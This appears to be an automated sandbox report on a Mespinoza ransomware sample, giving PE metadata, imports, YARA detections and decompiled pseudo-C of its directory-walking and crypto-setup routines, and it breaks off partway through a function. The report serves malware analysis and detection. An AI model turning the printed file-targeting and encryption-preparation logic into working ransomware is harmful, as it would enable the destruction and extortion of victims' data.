                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x432f39
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows cui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x5F4ACE62 [Sat Aug 29 21:53:38 2020 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:b5e8bd2552848bb7bf2f28228d014742

                  Entrypoint Preview

                  Instruction
                  call 00007FF194B6AD41h
                  jmp 00007FF194B6A24Ch
                  push ebp
                  mov ebp, esp
                  and dword ptr [00479F6Ch], 00000000h
                  sub esp, 28h
                  push ebx
                  xor ebx, ebx
                  inc ebx
                  or dword ptr [00475240h], ebx
                  push 0000000Ah
                  call 00007FF194B8C35Eh
                  test eax, eax
                  je 00007FF194B6A533h
                  and dword ptr [ebp-10h], 00000000h
                  xor eax, eax
                  or dword ptr [00475240h], 02h
                  xor ecx, ecx
                  push esi
                  push edi
                  mov dword ptr [00479F6Ch], ebx
                  lea edi, dword ptr [ebp-28h]
                  push ebx
                  cpuid
                  mov esi, ebx
                  pop ebx
                  mov dword ptr [edi], eax
                  mov dword ptr [edi+04h], esi
                  mov dword ptr [edi+08h], ecx
                  mov dword ptr [edi+0Ch], edx
                  mov eax, dword ptr [ebp-28h]
                  mov ecx, dword ptr [ebp-1Ch]
                  mov dword ptr [ebp-08h], eax
                  xor ecx, 49656E69h
                  mov eax, dword ptr [ebp-20h]
                  xor eax, 6C65746Eh
                  or ecx, eax
                  mov eax, dword ptr [ebp-24h]
                  push 00000001h
                  xor eax, 756E6547h
                  or ecx, eax
                  pop eax
                  push 00000000h
                  pop ecx
                  push ebx
                  cpuid
                  mov esi, ebx
                  pop ebx
                  mov dword ptr [edi], eax
                  mov dword ptr [edi+04h], esi
                  mov dword ptr [edi+08h], ecx
                  mov dword ptr [edi+0Ch], edx
                  jne 00007FF194B6A405h
                  mov eax, dword ptr [ebp-28h]
                  and eax, 0FFF3FF0h
                  cmp eax, 000106C0h
                  je 00007FF194B6A3E5h
                  cmp eax, 00020660h
                  je 00007FF194B6A3DEh
                  cmp eax, 00020670h
                  je 00007FF194B6A3D7h
                  cmp eax, 00030650h
                  je 00007FF194B6A3D0h
                  cmp eax, 00030660h
                  je 00007FF194B6A3C9h
                  cmp eax, 00030670h

                  Rich Headers

                  Programming Language:
                  • [RES] VS2015 UPD3 build 24213
                  • [IMP] VS2008 SP1 build 30729

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73e2c0x64.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7d0000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x604c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x6b0a00x38.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x6b1340x18.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6b0d80x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x5a0000x1a8.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x5816b0x58200False0.480751329787data6.70762118964IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x5a0000x1a7b20x1a800False0.434376842571data5.28568891651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x750000x5a700x3800False0.188337053571data4.77578443016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .gfids0x7b0000x1e00x200False0.5859375data3.71882974859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .tls0x7c0000x90x200False0.033203125data0.0203931352361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x7d0000x1e00x200False0.53125data4.71767883295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x7e0000x604c0x6200False0.620296556122data6.52543506605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_MANIFEST0x7d0600x17dXML 1.0 document textEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllCreateFileA, GetFileAttributesExW, FindFirstFileW, FindNextFileW, ReleaseMutex, CreateMutexA, OpenMutexA, FreeConsole, HeapAlloc, HeapFree, GetProcessHeap, GetTempPathA, CreateThread, WaitForMultipleObjects, GetLastError, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, CreateFileW, ReadConsoleW, WriteConsoleW, GetDriveTypeW, GetModuleFileNameA, GetLogicalDriveStringsW, CloseHandle, FindClose, ExitProcess, WriteFile, SetStdHandle, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, SetEvent, ResetEvent, WaitForSingleObjectEx, InitializeSListHead, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, GetCurrentThreadId, InterlockedPushEntrySList, RaiseException, RtlUnwind, FreeLibrary, LoadLibraryExW, MoveFileExW, HeapReAlloc, GetModuleHandleExW, GetStdHandle, GetCommandLineA, GetCommandLineW, GetACP, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, SetFilePointerEx, HeapSize, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEndOfFile
                  USER32.dllwsprintfW, wsprintfA
                  ADVAPI32.dllCryptReleaseContext, CryptAcquireContextA, RegSetValueExA, RegOpenKeyExA, RegCloseKey, CryptGenRandom
                  SHELL32.dllShellExecuteA

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  No network behavior found

                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:01:55:00
                  Start date:25/11/2020
                  Path:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\6hFKK8UQi7.exe'
                  Imagebase:0x13c0000
                  File size:511488 bytes
                  MD5 hash:B6DD099B4C51EDAE5EA0C867FF2F12A7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000002.470657904.0000000000AEA000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000000.205056782.000000000141A000.00000002.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000003.287795640.0000000000B0B000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:01:55:00
                  Start date:25/11/2020
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6b2800000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:01:56:10
                  Start date:25/11/2020
                  Path:C:\Windows\System32\OpenWith.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                  Imagebase:0x7ff680270000
                  File size:111120 bytes
                  MD5 hash:D179D03728E95E040A889F760C1FC402
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  Code Analysis

                  Reset < >

                    Executed Functions

                    C-Code - Quality: 91%
                    			E013C9500(intOrPtr _a4, signed int _a8) {
                    				signed int _v8;
                    				char _v2052;
                    				short _v2054;
                    				short _v2056;
                    				char _v4104;
                    				struct _WIN32_FIND_DATAW _v4696;
                    				intOrPtr _v4700;
                    				void* _v4704;
                    				WCHAR* _v4708;
                    				WCHAR* _v4712;
                    				WCHAR* _v4716;
                    				WCHAR* _v4720;
                    				WCHAR* _v4724;
                    				WCHAR* _v4728;
                    				WCHAR* _v4732;
                    				WCHAR* _v4736;
                    				void* __ebp;
                    				signed int _t56;
                    				void* _t66;
                    				signed int _t69;
                    				signed int _t70;
                    				int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				intOrPtr _t80;
                    				signed int _t84;
                    				signed int _t85;
                    				signed int _t87;
                    				void* _t93;
                    				void* _t95;
                    				void* _t97;
                    				void* _t98;
                    				intOrPtr _t99;
                    				signed int _t102;
                    				void* _t104;
                    				intOrPtr* _t107;
                    				intOrPtr* _t110;
                    				intOrPtr* _t113;
                    				intOrPtr* _t128;
                    				void* _t130;
                    				void* _t131;
                    				signed int _t132;
                    				intOrPtr _t133;
                    				intOrPtr _t134;
                    				void* _t136;
                    				void* _t138;
                    				signed int _t140;
                    				void* _t142;
                    				intOrPtr* _t143;
                    				signed int _t144;
                    				void* _t145;
                    				intOrPtr* _t146;
                    
                    				E013F2860();
                    				_t56 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t56 ^ _t144;
                    				_v4736 = L":\\Windows\\";
                    				_v4732 = L"\\Boot\\";
                    				_v4728 = L"\\BOOTSECT";
                    				_v4724 = L"\\pagefile";
                    				_v4720 = L"\\System Volume Information\\";
                    				_v4716 = L"bootmgr";
                    				_v4712 = L"\\Recovery";
                    				_v4708 = L"\\Microsoft";
                    				E013FF144( &_v4104, 0x400, _a4);
                    				wsprintfW( &_v2056, L"%s\\*.*",  &_v4104);
                    				_t146 = _t145 + 0x18;
                    				_t66 = FindFirstFileW( &_v2056,  &_v4696); // executed
                    				_t136 = _t66;
                    				_v4704 = _t136;
                    				if(_t136 == 0xffffffff) {
                    					L41:
                    					return E013F268B(0, _v8 ^ _t144);
                    				}
                    				_t102 = _a8;
                    				_t140 = 0;
                    				_v4700 = 0;
                    				do {
                    					_t107 = ".";
                    					_t69 =  &(_v4696.cFileName);
                    					while(1) {
                    						_t130 =  *_t69;
                    						if(_t130 !=  *_t107) {
                    							break;
                    						}
                    						if(_t130 == 0) {
                    							L7:
                    							_t70 = _t140;
                    							L9:
                    							if(_t70 == 0) {
                    								goto L39;
                    							}
                    							_t110 = L"..";
                    							_t74 =  &(_v4696.cFileName);
                    							while(1) {
                    								_t131 =  *_t74;
                    								if(_t131 !=  *_t110) {
                    									break;
                    								}
                    								if(_t131 == 0) {
                    									L15:
                    									_t75 = _t140;
                    									L17:
                    									if(_t75 == 0) {
                    										goto L39;
                    									}
                    									wsprintfW( &_v2056, L"%s\\%s",  &_v4104,  &(_v4696.cFileName));
                    									_t113 =  &_v2056;
                    									_t146 = _t146 + 0x10;
                    									_t132 = _t113 + 2;
                    									do {
                    										_t80 =  *_t113;
                    										_t113 = _t113 + 2;
                    									} while (_t80 != _t140);
                    									_t116 = (_t113 - _t132 >> 1) - 1;
                    									if(_t116 <= 2) {
                    										L29:
                    										if(_v2056 != 0x43 || _v2054 != 0x3a) {
                    											L35:
                    											if((_v4696.dwFileAttributes & 0x00000010) == 0) {
                    												_t142 = E013C8EBF( &_v2056);
                    												 *_t146 = L"*.*";
                    												_push( &_v2056);
                    												_t84 = E013F5BC8(_t116);
                    												__eflags = _t84;
                    												if(_t84 != 0) {
                    													goto L38;
                    												}
                    												_t85 = E013C9066(_t142, _t102);
                    												__eflags = _t85;
                    												if(_t85 == 0) {
                    													goto L38;
                    												}
                    												_t87 = E013C8EE5( &_v2056);
                    												_t140 = 0;
                    												_pop(1);
                    												__eflags = _t132;
                    												if(__eflags < 0) {
                    													goto L39;
                    												}
                    												if(__eflags > 0) {
                    													L50:
                    													__eflags = _t102;
                    													if(_t102 == 0) {
                    														L52:
                    														_push(_t132);
                    														_push(_t87);
                    														_push( &_v2056); // executed
                    														E013C67F8(1, _t132); // executed
                    														_t146 = _t146 + 0xc;
                    														goto L39;
                    													}
                    													L51:
                    													__eflags = _t102 - 1;
                    													if(_t102 != 1) {
                    														goto L39;
                    													}
                    													goto L52;
                    												}
                    												__eflags = _t87;
                    												if(_t87 <= 0) {
                    													goto L39;
                    												}
                    												__eflags = _t132;
                    												if(__eflags < 0) {
                    													goto L51;
                    												}
                    												if(__eflags > 0) {
                    													goto L50;
                    												}
                    												__eflags = _t87 - 0x400;
                    												if(_t87 <= 0x400) {
                    													goto L51;
                    												}
                    												goto L50;
                    											}
                    											E013C9500( &_v2056, _t102); // executed
                    											if(_t102 > 0) {
                    												E013C9F85(_t132,  &_v2056); // executed
                    											}
                    											goto L38;
                    										} else {
                    											_t93 = 0x5c;
                    											if(_v2052 != _t93) {
                    												goto L35;
                    											} else {
                    												goto L32;
                    											}
                    											do {
                    												L32:
                    												_push( *((intOrPtr*)(_t144 + _t140 * 4 - 0x127c)));
                    												_push( &_v2056);
                    												_t95 = E013F5BC8(_t116);
                    												_pop(_t116);
                    												if(_t95 == 0) {
                    													goto L34;
                    												}
                    												_push(L"SQL");
                    												_push( &_v2056);
                    												_t97 = E013F5BC8(_t116);
                    												_pop(_t116);
                    												if(_t97 == 0) {
                    													L38:
                    													_t140 = 0;
                    													goto L39;
                    												}
                    												L34:
                    												_t140 = _t140 + 1;
                    											} while (_t140 < 8);
                    											goto L35;
                    										}
                    									}
                    									_t143 =  &_v2052;
                    									_t138 = _t116 - 2;
                    									_t98 = 0x5c;
                    									do {
                    										if( *_t143 != _t98) {
                    											goto L27;
                    										}
                    										_t132 = _t143 + 2;
                    										if( *_t132 != _t98) {
                    											goto L27;
                    										}
                    										_t128 = _t143;
                    										_t104 = _t128 + 2;
                    										do {
                    											_t99 =  *_t128;
                    											_t128 = _t128 + 2;
                    										} while (_t99 != _v4700);
                    										_t116 = _t128 - _t104 >> 1;
                    										E013FF144(_t143, _t128 - _t104 >> 1, _t132);
                    										_t146 = _t146 + 0xc;
                    										_t98 = 0x5c;
                    										L27:
                    										_t143 = _t143 + 2;
                    										_t138 = _t138 - 1;
                    									} while (_t138 != 0);
                    									_t102 = _a8;
                    									_t140 = 0;
                    									_t136 = _v4704;
                    									goto L29;
                    								}
                    								_t133 =  *((intOrPtr*)(_t74 + 2));
                    								_t24 = _t110 + 2; // 0x2e
                    								if(_t133 !=  *_t24) {
                    									break;
                    								}
                    								_t74 = _t74 + 4;
                    								_t110 = _t110 + 4;
                    								if(_t133 != 0) {
                    									continue;
                    								}
                    								goto L15;
                    							}
                    							asm("sbb eax, eax");
                    							_t75 = _t74 | 1;
                    							__eflags = _t75;
                    							goto L17;
                    						}
                    						_t134 =  *((intOrPtr*)(_t69 + 2));
                    						_t21 = _t107 + 2; // 0x2e0000
                    						if(_t134 !=  *_t21) {
                    							break;
                    						}
                    						_t69 = _t69 + 4;
                    						_t107 = _t107 + 4;
                    						if(_t134 != 0) {
                    							continue;
                    						}
                    						goto L7;
                    					}
                    					asm("sbb eax, eax");
                    					_t70 = _t69 | 1;
                    					__eflags = _t70;
                    					goto L9;
                    					L39:
                    					_t72 = FindNextFileW(_t136,  &_v4696); // executed
                    				} while (_t72 != 0);
                    				FindClose(_t136); // executed
                    				goto L41;
                    			}























































                    0x013c9508
                    0x013c950d
                    0x013c9514
                    0x013c9522
                    0x013c9532
                    0x013c953c
                    0x013c9546
                    0x013c9550
                    0x013c955a
                    0x013c9564
                    0x013c956e
                    0x013c9578
                    0x013c9590
                    0x013c9596
                    0x013c95a7
                    0x013c95ad
                    0x013c95af
                    0x013c95b8
                    0x013c977f
                    0x013c978f
                    0x013c978f
                    0x013c95bf
                    0x013c95c3
                    0x013c95c5
                    0x013c95cb
                    0x013c95cb
                    0x013c95d0
                    0x013c95d6
                    0x013c95d6
                    0x013c95dc
                    0x00000000
                    0x00000000
                    0x013c95e1
                    0x013c95f8
                    0x013c95f8
                    0x013c9603
                    0x013c9605
                    0x00000000
                    0x00000000
                    0x013c960b
                    0x013c9610
                    0x013c9616
                    0x013c9616
                    0x013c961c
                    0x00000000
                    0x00000000
                    0x013c9621
                    0x013c9638
                    0x013c9638
                    0x013c9643
                    0x013c9645
                    0x00000000
                    0x00000000
                    0x013c9665
                    0x013c966b
                    0x013c9671
                    0x013c9674
                    0x013c9677
                    0x013c9677
                    0x013c967a
                    0x013c967d
                    0x013c9686
                    0x013c968a
                    0x013c96de
                    0x013c96e6
                    0x013c9734
                    0x013c9741
                    0x013c9796
                    0x013c9798
                    0x013c97a5
                    0x013c97a6
                    0x013c97ad
                    0x013c97af
                    0x00000000
                    0x00000000
                    0x013c97b3
                    0x013c97ba
                    0x013c97bc
                    0x00000000
                    0x00000000
                    0x013c97c5
                    0x013c97ca
                    0x013c97cc
                    0x013c97cd
                    0x013c97cf
                    0x00000000
                    0x00000000
                    0x013c97d1
                    0x013c97e4
                    0x013c97e4
                    0x013c97e7
                    0x013c97f5
                    0x013c97f5
                    0x013c97f6
                    0x013c97fd
                    0x013c97fe
                    0x013c9803
                    0x00000000
                    0x013c9803
                    0x013c97e9
                    0x013c97ec
                    0x013c97ef
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c97ef
                    0x013c97d3
                    0x013c97d5
                    0x00000000
                    0x00000000
                    0x013c97d7
                    0x013c97d9
                    0x00000000
                    0x00000000
                    0x013c97db
                    0x00000000
                    0x00000000
                    0x013c97dd
                    0x013c97e2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c97e2
                    0x013c9745
                    0x013c974f
                    0x013c9758
                    0x013c975d
                    0x00000000
                    0x013c96f2
                    0x013c96f4
                    0x013c96fc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c96fe
                    0x013c96fe
                    0x013c96fe
                    0x013c970b
                    0x013c970c
                    0x013c9712
                    0x013c9715
                    0x00000000
                    0x00000000
                    0x013c971d
                    0x013c9722
                    0x013c9723
                    0x013c9729
                    0x013c972c
                    0x013c975e
                    0x013c975e
                    0x00000000
                    0x013c975e
                    0x013c972e
                    0x013c972e
                    0x013c972f
                    0x00000000
                    0x013c96fe
                    0x013c96e6
                    0x013c968e
                    0x013c9694
                    0x013c9697
                    0x013c9698
                    0x013c969b
                    0x00000000
                    0x00000000
                    0x013c969d
                    0x013c96a3
                    0x00000000
                    0x00000000
                    0x013c96a5
                    0x013c96a7
                    0x013c96aa
                    0x013c96aa
                    0x013c96ad
                    0x013c96b0
                    0x013c96bc
                    0x013c96c0
                    0x013c96c5
                    0x013c96ca
                    0x013c96cb
                    0x013c96cb
                    0x013c96ce
                    0x013c96ce
                    0x013c96d3
                    0x013c96d6
                    0x013c96d8
                    0x00000000
                    0x013c96d8
                    0x013c9623
                    0x013c9627
                    0x013c962b
                    0x00000000
                    0x00000000
                    0x013c962d
                    0x013c9630
                    0x013c9636
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c9636
                    0x013c963c
                    0x013c9641
                    0x013c9641
                    0x00000000
                    0x013c9641
                    0x013c95e3
                    0x013c95e7
                    0x013c95eb
                    0x00000000
                    0x00000000
                    0x013c95ed
                    0x013c95f0
                    0x013c95f6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c95f6
                    0x013c95fc
                    0x013c9601
                    0x013c9601
                    0x00000000
                    0x013c9760
                    0x013c9768
                    0x013c976e
                    0x013c9777
                    0x00000000

                    APIs
                    • wsprintfW.USER32(?,%s\*.*,?,?,00000400), ref: 013C9590
                    • FindFirstFileW.KERNEL32(?,?), ref: 013C95A7
                    • wsprintfW.USER32(?,%s\%s,?,?), ref: 013C9665
                    • _wcsstr.LIBVCRUNTIME ref: 013C970C
                    • _wcsstr.LIBVCRUNTIME ref: 013C9723
                    • FindNextFileW.KERNEL32(00000000,?), ref: 013C9768
                    • FindClose.KERNEL32(00000000), ref: 013C9777
                    • _wcsstr.LIBVCRUNTIME ref: 013C97A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Find_wcsstr$Filewsprintf$CloseFirstNext
                    • String ID: %s\%s$%s\*.*$:$C$SQL
                    • API String ID: 2716949753-2032610380
                    • Opcode ID: 6a7ec3b41efa2a9cb4ea82847bc0fd5171db64c73b4a89e2e92ec799825bdf65
                    • Instruction ID: 81f8fff7b9c7318c888452db7f36784e2fb5eea72ccb18552741e1c390e279c5
                    • Opcode Fuzzy Hash: 6a7ec3b41efa2a9cb4ea82847bc0fd5171db64c73b4a89e2e92ec799825bdf65
                    • Instruction Fuzzy Hash: 6B8129769412199ADF24EF68CD84BEA73BCEB14B2CF06409ED609D7180EB319E94CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E013E9FC0(HCRYPTPROV* __ecx) {
                    				char* _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v44;
                    				char _v84;
                    				void* __ebp;
                    				signed int _t11;
                    				signed int _t12;
                    				int _t14;
                    				char* _t18;
                    				int _t19;
                    				long _t27;
                    				HCRYPTPROV* _t39;
                    				signed int _t41;
                    
                    				_push(0xffffffff);
                    				_push(E01417C58);
                    				_push( *[fs:0x0]);
                    				_t11 =  *0x1435234; // 0x78d9f939
                    				_t12 = _t11 ^ _t41;
                    				_v20 = _t12;
                    				_push(_t12);
                    				 *[fs:0x0] =  &_v16;
                    				_t39 = __ecx;
                    				 *__ecx = 0; // executed
                    				_t14 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
                    				if(_t14 == 0) {
                    					_t27 = GetLastError();
                    					_t18 = CryptAcquireContextA(_t39, "Crypto++ RNG", 0, 1, 8);
                    					if(_t18 == 0) {
                    						_t19 = CryptAcquireContextA(_t39, "Crypto++ RNG", _t18, 1, 0x28);
                    						_t46 = _t19;
                    						if(_t19 == 0) {
                    							SetLastError(_t27);
                    							E013C2AD0( &_v44, "CryptAcquireContext");
                    							_v8 = 0;
                    							E013EA130( &_v84, _t46,  &_v44);
                    							E013F4EC6( &_v84, 0x1432bdc);
                    						}
                    					}
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t39, _v20 ^ _t41);
                    			}

















                    0x013e9fc3
                    0x013e9fc5
                    0x013e9fd0
                    0x013e9fd4
                    0x013e9fd9
                    0x013e9fdb
                    0x013e9fe1
                    0x013e9fe5
                    0x013e9feb
                    0x013e9fff
                    0x013ea005
                    0x013ea009
                    0x013ea01d
                    0x013ea01f
                    0x013ea023
                    0x013ea030
                    0x013ea032
                    0x013ea034
                    0x013ea037
                    0x013ea045
                    0x013ea04d
                    0x013ea058
                    0x013ea066
                    0x013ea066
                    0x013ea034
                    0x013ea023
                    0x013ea070
                    0x013ea088

                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA005
                    • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA00B
                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA01F
                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028,?,Crypto++ RNG,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA030
                    • SetLastError.KERNEL32(00000000,?,Crypto++ RNG,00000000,00000001,00000028,?,Crypto++ RNG,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000), ref: 013EA037
                      • Part of subcall function 013EA130: GetLastError.KERNEL32(00000010,78D9F939,75D701B0,?,00000000,?,?,?,?,?,?,?,?,01417CB6,000000FF), ref: 013EA171
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA066
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                    • String ID: CryptAcquireContext$Crypto++ RNG
                    • API String ID: 3279666080-1159690233
                    • Opcode ID: 0c52648e69cb754ca6f89f601ece284061d1d56c660c43aafd0e58611834f7a9
                    • Instruction ID: 99c16cbd1be387f9607bba61869a6ccb724e6633b012791f1f35ba71fe2a4b1f
                    • Opcode Fuzzy Hash: 0c52648e69cb754ca6f89f601ece284061d1d56c660c43aafd0e58611834f7a9
                    • Instruction Fuzzy Hash: A011D6B1B80759AADB209FA9CC45F9F77ECEB48B14F10012AF601E71C4DBB5A4048754
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E013CA164(void* __ecx, void* __eflags) {
                    				signed int _t65;
                    				HANDLE* _t73;
                    				long _t81;
                    				void* _t87;
                    				void* _t92;
                    				void** _t95;
                    				long _t96;
                    				signed int _t98;
                    				HANDLE* _t111;
                    				signed int _t127;
                    				intOrPtr _t128;
                    				long _t129;
                    				signed int _t130;
                    				intOrPtr _t131;
                    				void** _t132;
                    				void* _t133;
                    				void* _t137;
                    
                    				_t137 = __eflags;
                    				_push(0x40);
                    				E013F26F6(E0141615F);
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_push(_t133 - 0x1c); // executed
                    				E013C8F21(_t137); // executed
                    				_t98 = 0x18;
                    				asm("cdq");
                    				_t65 = ( *((intOrPtr*)(_t133 - 0x18)) -  *((intOrPtr*)(_t133 - 0x1c))) / _t98;
                    				 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
                    				_t130 = _t65;
                    				_t127 = 4;
                    				 *(_t133 - 0x40) = _t130;
                    				_push( ~(_t137 > 0) | _t65 * _t127);
                    				_t95 = E013F2CD3( ~(_t137 > 0) | _t65 * _t127, _t137);
                    				 *(_t133 - 0x38) = _t95;
                    				_push( ~(_t137 > 0) | _t130 * _t127);
                    				 *((intOrPtr*)(_t133 - 0x44)) = E013F2CD3( ~(_t137 > 0) | _t130 * _t127, _t137);
                    				_push( ~(_t137 > 0) | _t130 * _t127);
                    				_t73 = E013F2CD3( ~(_t137 > 0) | _t130 * _t127, _t137);
                    				_t131 =  *((intOrPtr*)(_t133 - 0x1c));
                    				_t128 =  *((intOrPtr*)(_t133 - 0x18));
                    				_t111 = _t73;
                    				 *(_t133 - 0x3c) = _t111;
